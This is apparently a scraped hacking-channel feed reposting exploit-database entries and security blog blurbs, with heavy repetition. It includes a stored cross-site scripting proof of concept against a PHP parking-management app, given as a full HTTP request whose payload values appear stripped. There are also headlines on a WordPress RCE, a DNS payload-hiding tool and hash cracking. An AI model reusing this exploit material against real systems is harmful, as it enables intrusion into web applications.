Hacking Articles Tips Tricks Videos Tutorials
Photo
Exploit Collector
Vehicle Parking Management System 1.0 Cross Site Scripting
https://4.bp.blogspot.com/-mkcU-A73eZ4/WWlu7eKaHEI/AAAAAAAAIJY/m_4841aOwNcKGKR9ykgWprFWjwy04TKNACLcBGAs/s1600/h11.png
Vehicle Parking Management System version 1.0 suffers from a persistent cross site scripting vulnerability. Original discovery of persistent cross site scripting in this version is attributed to Tushar Vaidya in February of 2021.
MD5 |
Download
Source:packetstormsecurity.com
___________________________
@hacking_Attack
@Hacking_Video
Vehicle Parking Management System 1.0 Cross Site Scripting
https://4.bp.blogspot.com/-mkcU-A73eZ4/WWlu7eKaHEI/AAAAAAAAIJY/m_4841aOwNcKGKR9ykgWprFWjwy04TKNACLcBGAs/s1600/h11.png
Vehicle Parking Management System version 1.0 suffers from a persistent cross site scripting vulnerability. Original discovery of persistent cross site scripting in this version is attributed to Tushar Vaidya in February of 2021.
MD5 |
ac9f28e3fc856df19b30c3f0ff99cfb6Download
# Exploit Title: Vehicle Parking Management System - Stored Cross-Site-Scripting (XSS)
# Date: 2021-07-09
# Exploit Author: faisalfs10x (https://github.com/faisalfs10x)
# Vendor Homepage: https://phpgurukul.com
# Software Link: https://phpgurukul.com/vehicle-parking-management-system-using-php-and-mysql/
# Version: 1.0
# Tested on: Windows 10, XAMPP
################
# Description #
################
# The system is vulnerable to Stored XSS on add-vehicle.php endpoint.
########
# PoC #
########
PoC ) param vehcomp,vehreno,ownername - Stored XSS
Payload: 1;
Request:
========
POST /vpms/add-vehicle.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------39455081863880051020862918006
Content-Length: 842
Origin: http://localhost
DNT: 1
Connection: close
Referer: http://localhost/vpms/add-vehicle.php
Cookie: PHPSESSID=01nt1pa7lgtioktv5ii907c8l3
Upgrade-Insecure-Requests: 1
Sec-GPC: 1
-----------------------------39455081863880051020862918006
Content-Disposition: form-data; name="catename"
Bicycles
-----------------------------39455081863880051020862918006
Content-Disposition: form-data; name="vehcomp"
1;
-----------------------------39455081863880051020862918006
Content-Disposition: form-data; name="vehreno"
2;
-----------------------------39455081863880051020862918006
Content-Disposition: form-data; name="ownername"
3;
-----------------------------39455081863880051020862918006
Content-Disposition: form-data; name="ownercontno"
7627637673
-----------------------------39455081863880051020862918006
Content-Disposition: form-data; name="submit"
-----------------------------39455081863880051020862918006--
############
# Fire up #
############
1) Goto: Login as Admin
2) Goto: Manage Vehicle -> Manage In Vehicle -> Click view
3) Stored XSS payloads are fired
Source:packetstormsecurity.com
___________________________
@hacking_Attack
@Hacking_Video
Kitploit
Vehicle Parking Management System 1.0 Cross Site Scripting
Exploit Collector is the ultimate collection of public exploits and exploitable vulnerabilities. Remote/Local Exploits, Shellcode and 0days.
Exploit Collector
Wordpress Backup Guard Authenticated Remote Code Execution
___________________________
@hacking_Attack
@Hacking_Video
Wordpress Backup Guard Authenticated Remote Code Execution
___________________________
@hacking_Attack
@Hacking_Video
Kitploit
Wordpress Backup Guard Authenticated Remote Code Execution
Exploit Collector is the ultimate collection of public exploits and exploitable vulnerabilities. Remote/Local Exploits, Shellcode and 0days.
Exploit Collector
Sage X3 Administration Service Authentication Bypass / Command Execution
___________________________
@hacking_Attack
@Hacking_Video
Sage X3 Administration Service Authentication Bypass / Command Execution
___________________________
@hacking_Attack
@Hacking_Video
Kitploit
Sage X3 Administration Service Authentication Bypass / Command Execution
Exploit Collector is the ultimate collection of public exploits and exploitable vulnerabilities. Remote/Local Exploits, Shellcode and 0days.
Hacking Articles Tips Tricks Videos Tutorials
Photo
Kali Linux Tutorials
DNSStager : Hide Your Payload In DNS
DNSStager is an open-source project based on Python used to hide and transfer your payload using DNS. DNSStager will create a malicious DNS server that handles DNS requests to your domain and return your payload as a response to specific record requests such as AAAA or TXT records after splitting it into chunks and encoding the payload using different […]
The post DNSStager : Hide Your Payload In DNS appeared first on Kali Linux Tutorials.
___________________________
@hacking_Attack
@Hacking_Video
DNSStager : Hide Your Payload In DNS
DNSStager is an open-source project based on Python used to hide and transfer your payload using DNS. DNSStager will create a malicious DNS server that handles DNS requests to your domain and return your payload as a response to specific record requests such as AAAA or TXT records after splitting it into chunks and encoding the payload using different […]
The post DNSStager : Hide Your Payload In DNS appeared first on Kali Linux Tutorials.
___________________________
@hacking_Attack
@Hacking_Video
Kali Linux Tutorials
DNSStager : Hide Your Payload In DNS !!! Kali Linux
DNSStager is an open-source project based on Python used to hide and transfer your payload using DNS. It will create a malicious DNS server.
Hacking Articles Tips Tricks Videos Tutorials
Photo
Hacking on Medium
Resolvendo Bounty Hacker THM(PT-BR)
https://cdn-images-1.medium.com/max/1298/1*l_La9RtzUK4a3sBGMBiPSg.png
Resenvolvendo Bounty Hacker do TryHackMe (em português).
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Resolvendo Bounty Hacker THM(PT-BR)
https://cdn-images-1.medium.com/max/1298/1*l_La9RtzUK4a3sBGMBiPSg.png
Resenvolvendo Bounty Hacker do TryHackMe (em português).
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Medium
Resolvendo Bounty Hacker THM(PT-BR)
Resenvolvendo Bounty Hacker do TryHackMe (em português).
Hacking Articles Tips Tricks Videos Tutorials
Photo
Hacking on Medium
Pegasus Spyware. Everything you need to know
https://cdn-images-1.medium.com/max/1000/0*GROVzVbNKrbdJtQ2
Alright alright, another malware attack, WHAT’S NEW??? Well, this is a more interesting attack because it actually comes from the…
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Pegasus Spyware. Everything you need to know
https://cdn-images-1.medium.com/max/1000/0*GROVzVbNKrbdJtQ2
Alright alright, another malware attack, WHAT’S NEW??? Well, this is a more interesting attack because it actually comes from the…
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Medium
Pegasus Spyware. Everything you need to know
Alright alright, another malware attack, WHAT’S NEW??? Well, this is a more interesting attack because it actually comes from the…
Hacking Articles Tips Tricks Videos Tutorials
Photo
Hacking on Medium
Takeaways From the Mighty Pegasus — the NSO Group Spyware
https://cdn-images-1.medium.com/max/2600/1*x-akcj_ZIn12OWU7l3sIjA.jpeg
Even iPhone Security is No Match for NSO Group Spyware.
Continue reading on Technology Hits »
___________________________
@hacking_Attack
@Hacking_Video
Takeaways From the Mighty Pegasus — the NSO Group Spyware
https://cdn-images-1.medium.com/max/2600/1*x-akcj_ZIn12OWU7l3sIjA.jpeg
Even iPhone Security is No Match for NSO Group Spyware.
Continue reading on Technology Hits »
___________________________
@hacking_Attack
@Hacking_Video
Medium
Takeaways From the Mighty Pegasus — the NSO Group Spyware
Even iPhone Security is No Match for NSO Group Spyware.
Hacking Articles Tips Tricks Videos Tutorials
Photo
Hacking on Medium
Las nuevas fallas de Windows y Linux otorgan a los atacantes los privilegios del sistema más altos.
https://cdn-images-1.medium.com/max/1123/0*yKeeQ9r1CBF004oU
POR EHACKING
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Las nuevas fallas de Windows y Linux otorgan a los atacantes los privilegios del sistema más altos.
https://cdn-images-1.medium.com/max/1123/0*yKeeQ9r1CBF004oU
POR EHACKING
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Medium
Las nuevas fallas de Windows y Linux otorgan a los atacantes los privilegios del sistema más altos.
POR EHACKING
Hacking Articles Tips Tricks Videos Tutorials
Photo
Hacking on Medium
US Agency Warns of Stealthy Malware Found on Hacked Pulse Secure Devices. — CyberWorkx
An alert was released by the US CISA Agency about the malware samples identified in the hacked Pulse Secure Devices which are undetected…
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
US Agency Warns of Stealthy Malware Found on Hacked Pulse Secure Devices. — CyberWorkx
An alert was released by the US CISA Agency about the malware samples identified in the hacked Pulse Secure Devices which are undetected…
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Medium
US Agency Warns of Stealthy Malware Found on Hacked Pulse Secure Devices. — CyberWorkx
An alert was released by the US CISA Agency about the malware samples identified in the hacked Pulse Secure Devices which are undetected…
Hacking Articles Tips Tricks Videos Tutorials
Photo
Hacking on Medium
Kali Linux or ParrotOS?
https://cdn-images-1.medium.com/max/1337/1*JGe3RU0ESbTC80IJxfH_IA.jpeg
Which one is better?
Continue reading on Geek Culture »
___________________________
@hacking_Attack
@Hacking_Video
Kali Linux or ParrotOS?
https://cdn-images-1.medium.com/max/1337/1*JGe3RU0ESbTC80IJxfH_IA.jpeg
Which one is better?
Continue reading on Geek Culture »
___________________________
@hacking_Attack
@Hacking_Video
Medium
Kali Linux or ParrotOS?
Which one is better?
Unauthenticated Access To MongoDB Database of Oracle Corporation
Hello everyone, today I will be talking about one of the critical bugs which I found in the Oracle Corporation. Now, let’s start with the…Continue reading on Medium »
Read more...
Hello everyone, today I will be talking about one of the critical bugs which I found in the Oracle Corporation. Now, let’s start with the…Continue reading on Medium »
Read more...
Hash-Buster v3.0 - Crack Hashes In Seconds
http://www.kitploit.com/2021/07/hash-buster-v30-crack-hashes-in-seconds.html
___________________________
@hacking_Attack
@Hacking_Video
http://www.kitploit.com/2021/07/hash-buster-v30-crack-hashes-in-seconds.html
___________________________
@hacking_Attack
@Hacking_Video
KitPloit - PenTest & Hacking Tools
Hash-Buster v3.0 - Crack Hashes In Seconds